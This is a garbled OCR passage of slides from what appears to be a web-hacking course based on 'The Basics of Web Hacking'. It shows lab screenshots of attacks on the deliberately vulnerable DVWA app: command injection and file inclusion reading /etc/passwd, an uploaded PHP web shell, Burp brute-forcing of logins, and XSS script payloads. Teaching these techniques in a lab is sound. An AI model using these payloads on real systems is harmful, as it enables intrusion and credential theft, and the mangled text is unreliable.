  • 102. Ping for FREE Enler an IP address Wow Sut-.mil PING 127.(3.5.1 (127.13.0, l> 5&<84) bytes of data. bytes from! 127.6.6.1: icmp soq-1 ttl-Q4 time-6.642 ms 64 bytes freir 127.6,0.1: icirp seq,-2 tt-6-l tifne-B.G44 ms 64 bytes from 127.0.0.1: icmp teq-3 ttl-64 timc-B.B32 ms **- 127.0.6.1 piny statistics 3 packets transmitted, 3 received. Bit packet loss, iifliu l99Bms rt t *iiri/avy/itiex/:ndev - 0.03270.019/0, 044/0.007 ms help index.php source Ping for FREE Enter an IP address below; submit PING 127,0.6.1 (127.0.0.1) 56(3-1) bytes of data, 6.1 bytes from 127.3.G.L: icmp seq=l ttl=64 time-0. 040 ns 64 bytes from 127,0.0. l: icmp seg-2 ttl-64 time=e.647 ms 64 bytes from 127.0.0.1: icmp seq-3 ttl-64 t ime=G.039 ms — 127.0.0.1 ping statistics —3 packets transmitted, 3 received, 0% packet loss, time 1999ms rtt min/avg/itiax/mdev = 9.03970.042/0.047/0.003 ms root :x :0:G: root:/ root : /bin/basb daemon :x:1:1:daemon:/usr/sbin 1 /bin/$h bin:x :2:2: bin :/bin:/bin/sh sys:x :3:3:sys:/dev:/bin/sb sync:x :4:GS534:sync;/bin : /bin/sync games:x :5:68:games :/usr/games: /bin/sb man :x :6 :12:maru/var/cache/roan: /bin/s h Ip :x:7:7:lp:/var/spoot/lpd:/bin/sh mail :x :3:S:mail:/var/mail:/bin/sfr news:x :9:9:news:/var/spool/news ; /bin/ sh uucp; x ; 10:13:uutp: /var/spool/uucp: /bin/sh proxy : x:13:13: proxy:/bin: /bin/sh www- data:x:33:33:www-data: /var/ www: /bin/sh backup :x:34:34 ; backup: /var/backups: / bin/sh
  • 103.
  • 104. Vulnerability: File Uploa & H«III Choosy Afl image Ip upfeaij SeLuJ) 9lOwÿ . UploadBlUlt FMC4 Comm.-no ExotuUon x File Upload CSRF i . rootFile Inclusion SOL injection 5CL liifrcrign (guild) Places Search O Potently Used r Sire ModifiedName is' DCSfcTQp 07/10/2012 Upload SOOworet-paHwonds.txt DW/A install.*h aYvua_users.txt . j tocaUiQ&t-chMk.nfc** w Sheil_y(J_7.php 3.4 KB 07/11/2012 2.7 KB 07/10/2012 12 bytes 07/11/2012 407.4 K0 07/09/2012 17.1KB 03/17/2007 JXSS foUcctfd r n»t XSS slerctl 1 113 Desktop File System _floppy DoveJOVWA S«y rhey P HP inlo About J if root@bt: / File Edit View Terminal Help rootÿljL:/'# find / -name Shell yfl 7.php /root/SheUjv0_7.php /v3r/www/hackabWt/ploads/SheU v9 7, php /tmp/VMwa reDnD/da6c24a6/Shell vij_7, php rootÿbt : /# ft
  • 105. Applications Places System n v n Command Shell -127.0.0.1' Mozllla Firefox file £dd View History Book marks Toofs Help +, Command SheJI -127.0.0.1 §. : . . 127.0.0.1 Mds/Stieii_v0_7.php * < giaCkTraCk Linux ||Offersive Setun ty Ex pi011 DB Airerock ng jcm i-a FU |[EHCirtt camnuHl) [UplMdiBe] [Ehingt tUftctwy) [FBehmumr] [Create Fite] Quick Commands ;i p i Ocarhittn B »i I* *Oct' kHcrv Can 1function? Ctt stiver into jT] I V j j n Read /etc/piHwd hr-litiH!, Open p*rti Running! prtKeite t j; jl! i T* 1 i i Readme mCommand hlsto sixflhetft .1FT [r] ,i M [rl jJ'J [L ft] [-1 /i IL-H [l * [ÿIill rIT-I m [VI [ÿ_ 1 r-i1, [ÿÿj1. About AJax/PHP Command Shell try InsnftSt Vwmn 0 7ft / Y*rfwYrnJ njc n tfcrt / y phud i/
  • 106. * Command Shell -127.0.0.1 - MoztHa Firefcot File Edit View History Bookmarks Tools Help 404 Not FoundCommand Shell -127.0.0.1 X + S 127.0.0.1 _j_t _ :oa 2BackTrack unux []Otfensive Security gjExploit-DB Aircrack-ng gjSomaFM [Execute command] [Upload file) [[hinge directory] [File brawler] [Create File] Quick Commands , dal a-# netstat -an | grep -i listen 0 127.0,0.1:7337 0 127.0.0,1:3306 0 0 0-0-0:80 0 ::1:7337 0 127.0,0,1:0030 0 0.0.0,0:* O.G.O.O:* 0-0 0 Q:* LISTEN LISTEN LISTEN LISTEN LISTEN 01 r Screen 0tip Clear Hhrtory tep 0 [ Cen 1 function? tcpG ItcpS 0 * G s t i* [Execute command] [Upload file] [Change directory] [Filebrc wser] [Create File] ww-data-# Is IShel.ljfG_7.php Wvva_eniail .png -data-# ikdir goats WWW-data-# Is |SheU_vG_7.php dvwa_email .png [goatsJ WWW -data # cd goats .Current directory changed to goats WWW-data-# touch bah.txt WWW-data-# Is bah.tKt
  • 107.
  • 108.
  • 109.
  • 110.
  • 111. Vulnerabifity: Brute Force Login UMtTWTW. caraoji Paii™a E uyn burp intruder repeater window about I target [ prwy f spider~f scanner [ intruder f repeater [ sequencer [ intercept ' options history |_ request to http:Wl 27.0.0.1:60 drop intercept is on f raw [ panam6~7 headers 1 hew |_ GET request to toJlnerabiirties/brute/ forward action valuetype name URL comdoqsusername password Sureareyummy URL login Login cookie PHPSESSID m7cOuorvtemesgddjbv5oj4ue2 cookie lowsecurity
  • 112. burp intruder repeater window about ( target proxy j' spider scanne intruder ! repeater sequencer decoder comparer options j a intercept§ options J history [ Filter; hiding CS1;, image ;r J general binary content host method URL htt p://safebrqwsmg d.., ’ POST ysafebrowsinqfdowrioads?cItent navdient-auto-ffox6fappver-i6..., http:Ifl27,0,0,1 GET 'Milnerabilit ies/brutej?username-corndogs(*password-surearey... httpiffl27.0,0,1 GET MJlnerabifltiesfbrute/?usemame-comdqgs&password-surearey.,, 457 http://safiebrowsing-c... [GET [/safebrowsing/Td/ChNnb29nLWl hbHdhctnUtc2hhd niFyEAEYht OF(J|... 499 http:/fl27.0,0,1 [GET l/dvwaflsJdvwaPageds SOI ht tp://safebrowsing-c.„ . GET /safebrowsing/rd/chNnb29nLWl hbHdhcmutc2hhdniFyEÿVh.iFijc.., htt p:jYsaf ebrowsing GET rsafebrowsing/rd/chrtnb29mwl hbnd hemutt 2hhd mFyEAflYfcaYRo... * 494 -495 A 502 request [response j _ [ raw f parents f headers T hex | : GET request to MJlnerabilitiesÿbrute/ valuetype name URL corncfogsusername password SLirear&yumnny URL Login Login_ __ m7cbuorvtBm8sgddibv5ojJ ua 2conkie cookie PHPSESSlD lowsecurity
  • 113. 496 HttprOT27.0,0.1 http:W127.0.0, li'vulnerab...sword -sureareyummy&LoqirT- Login j497 499 hTtpiy/U'.-.o.o.i remove item from scope htt p://safebrow501 spider From here actively scan this i send to intruder send to repeater send to sequencer send to comparer (request) send to comparer (response) show response in browser request in browser_ Ihttp;y/safebrowM2 * request [ respons ( raw (' parents [ h GET request to h/ulr type URL usernai URL passwo 'Login PI HP'SE< Secur tj UPL Cookie cookie engagement tools [pro version only] show new history window add comment highlight delete this item clear history copy URL copy links in item save item i target fflHM spider nner f intruder ] repeater sequencer|decoder [ comparer |' optionin'' alerts | £TJ> I target ' positions ' payloads ' options | attack type sniper 5 payload positions GET /vuLntmbi lititsibiut*/ ?us-i:n«i>r-St:or ndog»lft.pjiasword-Jaur tareyunmyS£ Loyin-SLoginJ HTTP/1.I Host: i:7, 0,0.1 Mitr-Acrtnc; Mosuln/S.O (Xil: Llimw liOfi rv:US,U.2> Gecko/ 20100101 Firete*/ 10,0,2 Jtc-oept : tex t!ht ml.app11cat Ion/ n htm1+xml,app i1cat ion/ xml ; q 0.9, / ; q'Q £3 Accept-LAliynaye: en-ua,en:q-0.5 Acctpr-Entodlno; osip, dttlatt Proxy-ConnccE Ion ; lie*p™n Live : tittp://i;7.0,0.1f vulnctah1lit iea/brUEc/ Cookie r PHP3ESS ID»ltB7eduotyttofl30ddybvSo3414*21: aecur ity*S1L>VS DMT: i
  • 114.
  • 115. - d uwa_usersrtnt IH -gedit File Edit View Search idols Documents i O'tsaye Mopen * <Jvwa_users,tict It asuifi gordonb 1337 pablo smithy) Target Positions I Payloads 1 Options | |7j Payload Sets You (in define one or more payload Sets The number of payload sett depends on the attack customized in different ways Payload count. 2 (appro*!Payload set _ Payload type: Runtime hit ZJ Redueit count: 0 Payload Options (Runtime tilej This payload type Jets you configure a hie from which to read payload itnrgs at runtime Select tile . /dwra users tct
  • 116. Dadmin password 200 4944 EF apablo letmein 200;ÿ4 4944 smithy password 494610 200 200a? qordonb abt!23 4948
  • 117.
  • 118.
  • 119. ideally loken HUE:spouse token Joeabon capture options O cookie. O form lieu * manual selection' BBC-U IQ= 64d733(1(14acb9372bCfiedSa6613tf251aÿOct?54 1 501 v Tdssi-Internal OnSi HTTPfi 1 200 Ok Dale Hi. I & Nov 2007 14 33 50 GMT Sewer Apache Set-CPokie B8CNrcrsAjutJtence= Domeshe; paSiÿl; domainÿ bbt ro jk; eÿpiresÿSat, t7-No*2Q07 14:38.50 OhflT Set-Ootids: £BC- UlDÿ 34<J73SdiMac b9872bcSed9a'oB1 afiQSI aSOdeCJ t SOI 091 377ac 4cl M baa25 mmcfllla*2*f%2e0%20%7ficompsbi)te%3s%20m$iE%20?%2e0%3H%2Gv4ndows %20NTO2(K%2et%3b%20lnfoPilk%2e I %3b%20% 2eNCT%20CLR K.202%2e0%2e5 0727%.’9; expires=$aT, 15-nijiaCO 14:3050 OWT; path=i; aomain=i)Dt.oouk, Accept-Range? lute? Cache-Control mav.age=0 token stalls: -mt>=•Slier SXPreSSfOM . al offset t94 lukeii ends: •a!delimiter al fixed length Moul 55 Ear Omaitneo stall capture
  • 120. Overall result Ths (jveral i quai itv of raniomness wdhin [he sample is eslmaled to be:encefent sign finance level of i % theimounioreflech-e entropy is estirraiedip&e H6 toils effective emi ci|ny The ch-ar; shwi m? nu m her ef tiits ureffective enl ropy at each sign finance leva1, hased t-n aH l?sls Each sign-fican( e I evei dtfines a rr mi mum srflbabiiiv atHie observed insults ectuir iry if mesample is ranaemtvgenerated w»fl ihe prt>:n a biiiiy at(He ptserved result? atemm p falls betel* mi? i mi trefivpomesis ihai ine sampie is ramprinty peneja:ed is rejected o?ing a tpwer sign titan ce level means thatsdonser evid ent e is required to reiect tne nypothesis that:ha sample - 1andem, and so incrants it e chartce ih at nonrandom date w II he treaie d as random *10% Significance level >0.t% >001% >0.0(Jt% 0 to 20 30 40 60 60 70 00 90 190 110 120 tOO 140 160 160 1 70 Number of bits oi enlrony Relinbilfly The analysis, is DsseaonasampieefJtOT tokens 3asec onihe sample sue, tne reliability of tee results is ie*senable no;e hei statistical tesis pnevide eniy?n indicative gjideio me randomness srthe sampled oaia Results coiamed mayconi? n raise pÿmves and negatives and may nonowespend 10 the preclifsi unseietabiirty af :he tokens sampEed.
  • 121. summarr | cuaretieHiiYei an-aiysla wthev* analysis ] opiums | summary ' FIPS monrftitlgsl ' FIPS soker test ' FIPS runs-[eat flPS[png inns 1esl spetMtegtS toirefabsn ' compression ' pfl comersipr FIPS nmiohfl tod aianificraiioF kwls Wtft - 10ft 1ft 0 tft - O.Olft UPS pass level O.QOtft - 1$ 0001ft 0 JO JO 60 SO 00 I JO 140 160 ISO 200 1*1 irusnron FIPS result 18© bits Passed latest The following 22 bitsfa iledlhe lest D, 1 , 2.7, U. ifi,17, 23, g*. 29, 31. 36. 50 55.56.61 1 59. 161.181, 1 69 tWKXualts 22ir»mat«"ware Idetwnfiifd w mis lesi too few ones al tM 0 (counl 649. orotuLihlv in a i«ndwn san$t* <ts* loin Oj&oijift) loo few ones al b 1 1 (tounl 6£1.p robatllity In a r J ndom sample OH than 0.0001ft) IOD fewOnus al b l 2ftcunl 865. p roba t ility In a random sample: ' ess than Q.OOQ1ft) lOo few ones a1 b 1 7 (coun: S71. n robit ility in a random Sample loss 1han 0 000' ft)
  • 122.
  • 123. / T bin etc varusr l IP L-tons of apps passwd _ lib WWW file I |dvwasrc L r I css L r ] images y {includes y r, I J* y
  • 124. v * root@bt: fvar/www/dvwa File Edit View Terminal Help root@ht:~# Is Desktop DVWA_install,sh localhost-check.nbe ZAp.html rootgbt:-# cd ../ root@bt:/# Is bin dev boot etc lab cdrom hone lost+found opt rootgbt:/# cd var root@bt:/var* Is backups cache lib _ root@bt:/var# cd www root(|bt;/var/www# Is dvwa external 4 initrd.ijng eedia pentest sbin mnt proc root srv usr selinux sys var share vnlinuz local log opt spool www run [JJS yp about.php CHANGELQG.txt config COPYING.tXt index. php instructions. php README.txt robots.txt security.php setup. php php.ini vulnerabilities wstool favicon.ico login.php hackable logout.php ids log.php phpinfo.phpdocs root@bt:/var/www# cd dwa root@bt:/var/www/dvwa# Is css inages includes js root@bt:!va r/www/dvwa# r* n ix
  • 125. Applications Places System -ÿ - Damn Vulnerable Web App {DVWAJ vl.0.7 :: Vulnerability: File Inclusion - Mozilla Fire1 £ile Edit History gookmarks Joels yelp A SI Damn Vulnerable Web App (DV... + <f3 S. E 127.0.0 1 53BackTrack Li: r |i|offensive Security ng .pomaFM ooncO O:n»t/raoiwivt»tii daemon or i ivsaernori-.usrtj&iri /tiiri.sri om x 2 icinyum junrirsnsirs>};J sys.'dev/tnn.'&h sync u 65334syi ftpoflUpdrarLfeti mailxB.s.niurlAariTnaili/bin'sli MwueSSfnmvaiSvwftpaaltamtiBAlnAri uuefvx lQ:lO:uuep:fV0r'fc{>ea(fLiLicpjbiii/4b pru tm-sJi list* 30 38 MnilinflLlJ!Managtrjarflt5lJbinÿhifCJf:39 39.JrKl AHifÿUjnJrif«JVtJrn/B*i gnalsx'i) 41;Grate Sug-Refiorltng Syilsm [q< ahdJL102:65054:jVarphin/»tt(J Aisrrtfcin/lnolooln landscspÿx103.1OS:Aof niMandfcotw J&lnrfols* ITTC ssagcbusx 104.1 12:JvaWuiiAatm Furahij::106.114 ..‘varfrunyovahi-daemonubin.Tals* SJiortx-107 115 Snc-rt rDS ,ar 1o(j.,sn.ort’,bin.,fjir.E» x 108 6553-’. 'af ,1jb.Tifsi.tin fa I nm.lai' -? fesDvai.a:i12:ÿ9.:-tiorr>C'll0sbvaiA>nrtjiK poatares:x: lOOOiiOOOiÿiomg.'pQsmres.-Tjin.'sn _ Home
  • 126.
  • 127.
  • 128.
  • 129.
  • 130.
  • 131.
  • 132.
  • 133.
  • 134. 5- Malicious script executes s~ÿ— a 2, Send malicious link 6. Cookie is sent User! HackerA. Respond with malicious script * 7. Masquerade as victim 1. Log in +- 3. Send malicious request Web application
  • 135. Vulnerability: Reflected Cross Site Scripting (XSS) ill's your jRod was here! Hello OK intercept server responses content t/p? [matches [ÿintercept if; H update Content-Length ] @m tent edit iwas modifiedrequestor ras interceptedreqi lestor remove I . and response code does not match "304$ and URL is in target scope up
  • 136. raw : params i headers j hex . C>£T request to Mjlnerat>ilities/xss_rt valuetype name %2Cscript%3EALERT%20%20JRod+was+ herg%21%20%20%20ÿscnpt%3EURL NAME 10Elrk8vql4s8i kqatneoÿfjfqcookie PHPSESSID lowcookie security burp intruder repeater window about target ] pns*y | sp.der ' | Inlert-apt | options ] history j response frcm httpy/L 2?.O.Q_1:SOMjInprÿh ilRies*ssjffname-%3CSCript%3Eale rt%ig*2JJftod-rwa,s+ here*,JIV.22%23%3CW 2tscript%:i iMruder rfptJter sequencer ' decoder ror'ipir-i options alertsoan'ie' rumaril drop ntorcept ii on action <div C lA33“"lS0dV_|iiHltlÿtl"> <hir'Vulnerability: Reflected Cross Site Scripting |XSS)</hl> <dLv cla*a“"vulti*cAble_cod*_iteA <f urm n«ne-">;S3<' Action-"*" KEhod-"QETH> <p>W1utr a your iumr?</p> <input name-"clam*":* sinj>uc cype="i5tt])wic" VtUue=,,3stibmicM> &cpctsltaiu <3 - ;ÿ ipr. >aJ.ert( "-JRod ||eie " ) c r 1 ]>r ></ pt T> t ' -:i LV>
  • 137. b-urpK intruder repeater window about spider ! 1 ntruder 1 repeater ; sequencer 1 decoder [ comparer 1 options i aterts itarget *:script •aierBC'Jftod was hefe!!l)</&cnpt> * -he* decode as... |ÿ| encode as ... plain url h t ml heisi asciE he* hex edÿl binary %3c%7ÿ6i3%72%6W70%74%3e%61%6c%6S%72%74%28%22%4a%ÿ2%6f%64%20%77%&l%73%20%63%6S% 72%65%21%22%2&%.3cÿ2r%7 3%& 3%72%fiÿ70%74%3e
  • 138. | target proxy ' _spider_ intruder_ ' repeater j sequencer decoder ["comparer options | Intercept opttonT~[history ] _ request to http:#127.0.0.1(30 -,i. drop intercept is onforward action ( raw params [ headers-!' hex j GET request to MJlnerabilitiesMsjV valuetype name 1%7 3%20ft6S% 21%22%29%3c%2W73%fe3%72%69%70%74%3e 10tlrkayql4sekkqacneo55fq7 URL NAME Bcookie c or ie PHPSE59ID security low EHe Edit VJew History Bookmark Tjwis Help ffiDamn vulnerable Web ftpp (0V._. S IB Q.qimiifterdUii.Ei&sftss_rÿn-3me=ÿstri(xyaieni-jRortHas hgre!")<%7fscMptJ-ÿ Lmi;n ['Joffensive Security UL*p!cn!-D& Aircnatk-ng jÿrbomaFH
  • 139. Vulnerability: Reflected Cross Site Scripting (XSS) PHp&eS5iDÿl(KlftSvql4s8l<kq4CfW55fq7; s«urity=ioiN
  • 140. 4, Malicious script executes A S. Cookie is sent User 3, Respond with maliciousscript Hacker Masquerade as victim - - Web application 2. View vulnerable page while authenticated 1. Plant stored XSS attack
  • 141. Vulnerability: Stored Cross Site Scripting (XSS) Nam* *-&cnpt>alerirThe Fed* are walctnng ros"Ji<JStnpt> Message ’ A Vulnerability: Stored Cross Site Scripting (XSS) Name ' The Feds ere watching me Message 1 i OK Kane: lesl Message: This is a lest comment. Name: Dave Message. I like hugs Marne- Kenh Message:
  • 142.
  • 143. The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com Select from the menu: 1) Social-Engineering Attacks 2} Fast-Track Penetration Testing 3} Third Party Modules 4) Update the Hetasploit Framework 5) Update the Social -Engineer Toolkit 6) Update SET configuration 7) Help, Credits, and About 99) Exit the Social -Engineer Toolkit in set*|
  • 144.
  • 145.
  • 146.
  • 147.
  • 148.
  • 149. tuuitter Twitter Is over capacity. H 'i of1w e»5* I.w U>J*TVt C**W1 Irÿrt tr- m*s *6* tQi Pinny
  • 150. •• PAGE NOT FOUND (p.s, see you soon)
  • 151.
  • 152.
  • 153.
  • 154.
  • 155.
  • 156.
  • 157.
  • 158.
  • 159.
  • 160.
  • 161.
  • 162.
  • 163.
  • 164.
  • 165.
  • 166.
  • 167.
  • 168.
  • 169.
  • 170.
  • 171.
  • 172.
  • 173.
  • 174.
  • 175.
  • 176.
  • 177.
  • 178.
  • 179. . : 0 W 2 0 z *S>>(ft THE BASICSOF WEB HACKING Todsand Techniques toAttack the Web 1 i |B in i r i : i i II in Josh Paul '